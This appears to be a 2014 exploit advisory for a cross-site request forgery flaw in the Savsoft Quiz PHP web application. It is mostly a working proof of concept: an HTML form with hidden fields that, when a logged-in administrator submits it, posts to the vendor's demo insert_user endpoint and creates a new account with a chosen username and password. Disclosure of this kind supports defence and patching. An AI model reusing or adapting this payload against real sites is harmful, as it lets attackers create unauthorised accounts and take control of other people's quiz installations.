facebook facebook twitter rss

Savsoft Quiz Cross-Site Request Forgery (Add Admin)

Author: TUNISIAN CYBER , Published: 24-02-2014
[+] Author: TUNISIAN CYBER
[+] Exploit Title: Savsoft Quiz Cross-Site Request Forgery (Add Admin) Vulnerability
[+] Date: 24-02-2014
[+] Category: WebApp
[+] Tested on: KaliLinux/Windows 7 Pro
[+] CWE: CWE-352
[+] Vendor: http://savsoftquiz.com/web/buy-now/
[+] Friendly Sites: na3il.com,th3-creative.com

1.OVERVIEW:
SuSavsoft Quiz suffers from a Cross-Site Request Forgery (Add Admin) Vulnerability.

2.Version:
All

3.Background:
Savsoft Quiz is a php based web application to create and manage online quiz,
test, exam on your web server or hosting
http://savsoftquiz.com/web/buy-now/


4.Proof Of Concept:
<form method="POST" name="form0" action="http://savsoftquiz.com/quizdemo/index.php/user_data/insert_user">
<input type="hidden" name="username" value="miuter12"/>
<input type="hidden" name="first_name" value="TUNISIAN"/>
<input type="hidden" name="last_name" value="CYBER"/>
<input type="hidden" name="user_email" value="g4k@hotmail.es"/>
<input type="hidden" name="user_password" value="p@assw0rd"/>
<input type="hidden" name="confirm_password" value="p@assw0rd"/>
<input type="hidden" name="user_credit" value="blank"/>
<input type="hidden" name="user_group" value="group1"/>
<input type="submit" value="Click ME!"/>
</form>

</body>
</html>


Like us on Facebook :